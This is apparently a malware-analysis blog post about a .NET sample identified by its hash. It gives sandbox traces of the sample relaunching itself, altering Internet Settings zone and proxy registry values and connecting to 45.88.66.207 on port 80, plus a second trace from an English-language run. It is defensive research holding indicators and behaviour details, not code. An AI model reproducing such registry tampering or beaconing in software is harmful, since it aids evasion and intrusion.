
Sample analysis: 99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d fails to run normally because the .NET program's configuration file is missing

Date: 2023-09-08 11:33:34


 

https://s.threatbook.com/report/file/99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d

09:30:16:088,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_create,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:200 cmdline:'C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe' image_base:0x0000000000C60000 image_size:0x000D8000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:104,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006E650000 size:0x0140E000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x0000000070BA0000 size:0x00A55000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x000000006DE30000 size:0x00818000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\03a6965bc1bb789f37779e8951ecafc7\Microsoft.VisualBasic.ni.dll,	base:0x0000000072AC0000 size:0x001E2000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ef599b69e76b0aaae802df819481912b\System.Drawing.ni.dll,	base:0x0000000072600000 size:0x001A3000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\dd2f3bb5941e68b9d4d6affbe6fcc632\System.Windows.Forms.ni.dll,	base:0x000000006CFC0000 size:0x00E68000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:810,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:810,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x00000000738A0000 size:0x00106000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:810,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:825,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x000000006C840000 size:0x00774000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:831,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll,	base:0x00000000730A0000 size:0x0008E000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:831,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x0000000073BF0000 size:0x0016F000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:864,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:864,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:864,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:19:800,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:19:800,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:19:800,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:19:860,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	PROC_exec,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	target_pid:1672 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' ,	0x00000000 [操作成功完成。  ],	
09:30:52:418,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:0,	1908,	EXEC_create,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:1908 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' image_base:0x0000000000C60000 image_size:0x000D8000 ,	0x00000000 [操作成功完成。  ],	
09:30:52:433,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:0,	1908,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x0000000073BF0000 size:0x0016F000 ,	0x00000000 [操作成功完成。  ],	
09:30:52:449,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_destroy,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:200 cmdline:'C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:9140,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix,	type:0x00000001 datalen:2 data:'00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:9140,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix,	type:0x00000001 datalen:16 data:'43 6F 6F 6B 69 65 3A 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:9140,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix,	type:0x00000001 datalen:18 data:'56 69 73 69 74 65 64 3A 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:480,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	NET_connect,	45.88.66.207:80,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:31:06:433,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:9140,	1908,	NET_connect,	45.88.66.207:80,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],

  

When run in an English-language environment, the result is:

09:37:10:492,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_create,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:8200 cmdline:'C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe' image_base:0x0000000000E70000 image_size:0x000D8000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:507,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Prefetch\99EDDC2794077F97A5CFE3098F431-2A2C7994.pf,	offset:0x00000000 datalen:0x00003C5B ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6216,	9028,	FILE_chmod,	C:\Windows\System32\wow64win.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6216,	9028,	FILE_chmod,	C:\Windows\System32\kernel32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\System32\wow64.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\System32\wow64cpu.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\ntdll.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:108,	9028,	FILE_chmod,	C:\Windows\System32\ntdll.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:108,	9028,	FILE_chmod,	C:\Windows\SysWOW64\mscoree.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\KernelBase.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:108,	9028,	FILE_chmod,	C:\Windows\SysWOW64\msvcrt.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\advapi32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\rpcrt4.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\sspicli.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5968,	9028,	FILE_chmod,	C:\Windows\SysWOW64\kernel32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:328,	9028,	FILE_chmod,	C:\Windows\System32\locale.nls,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:328,	9028,	FILE_chmod,	C:\Windows\SysWOW64\bcryptprimitives.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\cryptbase.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\ucrtbase.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6264,	9028,	FILE_chmod,	C:\Windows\SysWOW64\gdi32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\gdi32full.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6264,	9028,	FILE_chmod,	C:\Windows\SysWOW64\msvcp_win.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\user32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\kernel.appcore.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\vcruntime140_clr0400.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\SysWOW64\version.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:32,	9028,	FILE_chmod,	C:\Windows\SysWOW64\imm32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:32,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\SysWOW64\psapi.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\ucrtbase_clr0400.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\ole32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\SysWOW64\oleaut32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\uxtheme.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:328,	9028,	FILE_chmod,	C:\Windows\SysWOW64\combase.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\bcrypt.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5968,	9028,	FILE_chmod,	C:\Windows\SysWOW64\shlwapi.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6216,	9028,	FILE_chmod,	C:\Windows\System32\user32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:108,	9028,	FILE_chmod,	C:\Windows\SysWOW64\sechost.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6264,	9028,	FILE_chmod,	C:\Windows\SysWOW64\win32u.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:32,	9028,	FILE_chmod,	C:\Windows\Globalization\Sorting\SortDefault.nls,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:96,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\zh-Hans\mscorrc.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:539,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:539,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:328,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
